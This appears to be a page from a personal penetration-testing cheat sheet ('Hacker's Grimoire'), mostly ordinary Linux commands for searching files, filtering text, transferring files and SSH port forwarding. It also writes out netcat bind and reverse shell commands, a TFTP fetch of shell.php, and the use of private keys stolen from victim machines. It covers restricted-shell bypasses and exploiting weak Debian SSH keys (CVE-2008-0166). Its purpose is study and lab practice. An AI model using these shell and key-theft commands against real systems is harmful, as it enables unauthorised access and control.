Hacker's Grimoire
Search…
Hacker's Grimoire
Reconnaissance
Exploitation
Post exploitation
Linux basics
Windows basics
Learning resources
Powered By GitBook
Linux basics
A list of commands and techniques that are useful for getting around the file system and enumerating. I'm writing them down because they're easy to forget or mix up.

Finding things

There are some basic commands to find files and executables, but each one works differently.

Locate

Search against an index which must be updated periodically:
1
updatedb
2
locate nc.exe
Copied!

Which

Search through directories defined in the $PATH environment variable:
1
which gcc
Copied!

Find

Search recursively through directories:
1
find / -name "cron*"
Copied!

Ls

Never use the basic command, always list directory contents showing owner and including dot files like bash_history:
1
ls -la
2
-rw------- 1 joe staff 6863 26 Sep 17:12 .bash_history
3
-rw-r--r-- 1 joe staff 200 23 Jul 14:36 .bash_profile
4
drwx------ 129 joe staff 4128 1 Oct 15:41 .bash_sessions
Copied!

Basic Bash scripting

This isn't even really Bash scripting, it's more about how to chain commands together to do useful things.

Filter

Being able to process text-based files and pull out useful data is a useful skill. For example, to filter out domain names from an HTML file full of other stuff, you can grep for something uniquely associated with URLs, then cut out extraneous information:
1
<li><a href="http://newsroom.cisco.com/">Newsroom</a></li> # links you'd find in HTML
2
​
3
grep "href=" file.html | cut -d "/" -f 3
Copied!
In the above example, we are grepping for href= which identifies hyperlinks in HTML. We can filter more precisely by looking for recurring characters that help us divide the data into smaller chunks. The command cut -d "/" chunks the data and separates it by /. The -f 3 option tells us to filter out the 3rd chunk (field) of data.

Sort

Find unique items in a list with duplicates using sort -u:
1
grep "href=" file.html | cut -d "/" -f 3 | sort -u
Copied!

Simple loop

Run the host command on every domain in a text file:
1
for url in $(cat list.txt); do host $url; done
Copied!
Grep the output of host to find successful lookups:
1
for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
Copied!
In the above example, you're looking for lines with has address, filtering out the URL by using spaces as the delimiter and then removing duplicates with sort.

Directing output

Direct output to a file with >:
1
cat /root/key.txt > /tmp/key.txt
Copied!
Append output to a file with >>:
1
cat /root/key.txt >> /tmp/key.txt
Copied!
Direct output to another command with |:
1
grep "href=" file.html | cut -d "/" -f 3
Copied!

Netcat

Connect to a port

Connect to an open TCP or UDP port (e.g. mail service) to see if it responds:
1
nc -nv [host] 110
2
(UNKNOWN) [host] 110 (pop3) open
3
+OK POP3 server ready
Copied!

Bind shell

Bob (Windows) wants Alice (Linux) to connect to his computer remotely and issue commands. Bob sets up a listener which allows anyone connect to port 443 to issue commands via cmd.exe:
1
nc -nlvp 443 -e cmd.exe
Copied!
Alice then connects to Bob's machine and gets a Windows command prompt:
1
nc -nv [bob] 443
Copied!

Reverse shell

Netcat can also send a command shell to a listening host. Let's say Alice (Linux) wants Bob (Windows) to issue remote commands to her computer.
Bob sets up a listener on his machine:
1
nc -nlvp 443
2
listening on [any] 443...
Copied!
Alice then sends control of her command prompt to Bob's machine, via netcat:
1
nc -nv [bob] 443 -e /bin/bash
Copied!
This is what hackers mean by popping shells, but usually it's getting a web server/desktop to send a reverse shell to your attack machine.

Ncat

It's like netcat, but can encrypt connections and restrict access.
Taking the example of Bob (Windows) setting up a bind shell so that only Alice (Linux) could connect to it via SSL, his listener would look like this:
1
ncat --exec cmd.exe --allow [alice] -vnl 443 --ssl
Copied!
Alice would connect securely to Bob:
1
ncat -v [bob] 443 --ssl
Copied!

File transfer

Python

You'll use python's web server all the time to transfer exploits and move files between machines (or possibly even within machines). Pay attention to the port you use, as it may interfere with shells or firewalls:
1
cd exploits
2
python -m SimpleHTTPServer 80
Copied!

Netcat

To transfer files, set up a listener and redirect the output to a filename:
1
nc -nlvp 443 > nc.exe # receiving machine
2
listening on [any] 443...
3
​
4
nc -nv [host] 443 < nc.exe # sending machine pushes file
5
(UNKNOWN) [host] 443 (?) open
Copied!

Wget

Download files from another machine:
1
wget [host]:8080/test.txt
Copied!

Curl

Download files from another machine, such as webpages:
1
curl -O http://[host]/file.txt
Copied!

TFTP

TFTP works more or less like FTP:
1
tftp [host]
2
tftp> get file.txt
Copied!
If it can't be run interactively, this one-liner might work:
1
tftp [host] <<< "get shell.php shell.php"
Copied!

SCP

Copy a file:
1
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext
Copied!
Copy a directory:
1
scp -r /path/to/source/dir [email protected]:/path/to/destination
Copied!

SSH

SSH is surprisingly powerful and does way more than simply connecting you to remote machines.

Basic usage

SSH with a username:
1
ssh [email protected][host]
Copied!
SSH with a private key:
1
cd Desktop
2
ssh -i /root/Desktop/keyfile [email protected][host]
Copied!
If you find a private key in a victim machine (usually in home/user/.ssh/id_rsa) you can paste the keyfile contents into a text file on your local machine, set the right permissions with chmod 600 and ssh in with it.

Local port forwarding

Port forwarding can be tricky to understand, even with examples. There is a retired machine called Poison on Hack the Box which uses port forwarding. Reading some of the walkthroughs and attempting to exploit the machine does make things clearer.
But I still don't entirely get it, even though I've used the technique a few times. So maybe this section is wrong, lol.
Sometimes a service can only be accessed locally, for security reasons. The port might be open, but it will not accept remote connections. Let's say you have VNC running on a remote server and listening on the loopback interface (allows client software to communicate with server software on the same computer, usually with IP address 127.0.0.1 or localhost). To access this local-only service from your remote machine, you'll need to instruct SSH to forward connections from your machine's local port 5901 to the server's loopback interface + listening port for VNC: 127.0.0.1:5901.
This is the SSH command to forward your local port to the remote host's loopback interface:
1
ssh -L 5901:127.0.0.1:5901 [email protected][host]
Copied!
Once that connection is established, open a second terminal window and connect to the remote VNC service as if you were on the same box:
1
xtightvncviewer 127.0.0.1:5901
Copied!
So the first command instructs SSH to forward any connections from your machine's local port 5901 to 127.0.0.1:5901 on the remote host. Because of this tunnel, the second command lets you connect VNC service as if you were on the same server.
Here's another example using different local and remote ports: let's say you have PostgreSQL running on a remote server which can only be accessed from localhost on port 5432.
To forward connections from your local port 9000 to localhost:5432 on the remote server:
1
ssh -L 9000:localhost:5432 [email protected][host]
Copied!
Then you would access the PostgreSQL admin console using this command, as if you were on the remote server:
1
psql -h localhost -p 9000
Copied!

Bypassing restricted shells

SSH is one method of bypassing restricted shells (see Further Reading for more).
SSH in using a key, but without loading the restricted profile:
1
ssh -i keyfile [email protected][host] -t "bash --noprofile"
Copied!
SSH in, but execute some commands before the remote shell is created:
1
ssh -i keyfile [email protected][host] -t "/bin/sh"
Copied!

Debian SSH vulnerability

There's a famous vulnerability for old Debian-based systems (2006-2008, CVE-2008-0166) which basically makes the number of possible SSH keys small and predictable. Repositories of weak keys have been generated and can be searched if you happen to find an authorized_keys file. Using the string in that file, go into the corresponding folder of weak keys (DSA or RSA, choose the right one!) and grep for the public key:
1
grep -lr AAAAB3NzaC1kc3M[snip] *.pub
Copied!
If that key is vulnerable, it will return a public key file like this:
1
f1f[snip]-16858.pub
Copied!
Each public key in the weak key repository has a corresponding private key with the same filename. Copy it out and chmod 700 so that you can use it with ssh. It's very likely you'll need to update your local ssh config file /home/user/ssh/ssh_config with some ancient stuff to connect successfully, like this:
1
PubkeyAcceptedKeyTypes=+ssh-dss
Copied!
If it's still not working, add the -vvv debug parameter to your SSH command and google the error messages. There is also a good walkthrough of the whole process with a downloadable Vulnhub machine for practice.

Further reading

Previous
Privilege escalation: Windows
Next
Windows basics
Last modified 2yr ago
Copy link
Contents
Finding things
Locate
Which
Find
Ls
Basic Bash scripting
Filter
Sort
Simple loop
Directing output
Netcat
Connect to a port
Bind shell
Reverse shell
Ncat
File transfer
Python
Netcat
Wget
Curl
TFTP
SCP
SSH
Basic usage
Local port forwarding
Bypassing restricted shells
Debian SSH vulnerability
Further reading